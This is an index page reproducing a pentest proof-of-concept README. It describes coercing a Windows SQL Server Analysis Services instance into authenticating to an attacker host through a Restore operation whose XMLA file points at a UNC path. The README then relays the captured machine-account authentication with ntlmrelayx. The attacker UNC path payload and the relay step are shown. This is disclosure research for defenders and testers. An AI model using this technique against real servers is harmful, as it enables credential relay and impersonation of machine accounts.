Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/p0dalirius/mssql-analysis-coerce

A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.
https://github.com/p0dalirius/mssql-analysis-coerce

analysis coerce mssql pentest windows

Last synced: about 1 month ago
JSON representation

A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.

Host: GitHub
URL: https://github.com/p0dalirius/mssql-analysis-coerce
Owner: p0dalirius
Created: 2022-08-31T10:08:05.000Z (about 2 years ago)
Default Branch: main
Last Pushed: 2023-10-01T21:14:20.000Z (about 1 year ago)
Last Synced: 2024-10-12T07:03:36.132Z (about 1 month ago)
Topics: analysis, coerce, mssql, pentest, windows
Language: Python
Homepage:
Size: 2.49 MB
Stars: 124
Watchers: 3
Forks: 14
Open Issues: 0
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml

Awesome Lists containing this project

README

# MSSQL Analysis Services - Coerced Authentication

![](./.github/banner.png)

A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.

This proof of concept is co-authored by :
- Podalirius:
- Worty:

## Proof of concept

In order to trigger the authentification as the local machine account, we need to connect to the remote SQL Server using user credentials:

![](./.github/sql_analysis_connect.png)

Then we will select "Restore" to restore the database from a given file.

![](./.github/restore_db.png)

To generate the XMLA file, put the path to a random file in the "Backup File" form, and click Ok.

![](./.github/accessed_xml_script.png)

Then change the path to a random file and replace it with a UNC path to your attacker server (for example `\\192.168.128\SYSVOL\db.abf`)

![](./.github/unc_path_in_xml_file.png)

Proof of concept XMLA query ([poc.xmla](./poc.xmla)):

```xml

\\192.168.2.51\SYSVOL\db.abf
\\192.168.2.51\SYSVOL\db.abf
\\192.168.2.51\SYSVOL\db.abf

```

And we get an authentication from the local machine account of the SQL Server:

![](./.github/responder_auth.png)

## Relaying for the win

Once we got the authentification, we can relay it with `ntlmrelayx` to perform many actions on behalf of the computer `SQL01$`.

This is cool, but it is complicated to trigger this coerced authentication from a Linux attacking machine as we do not have access to the SQL Server Management Studio (SSMS).

## References
- https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
- https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
- https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html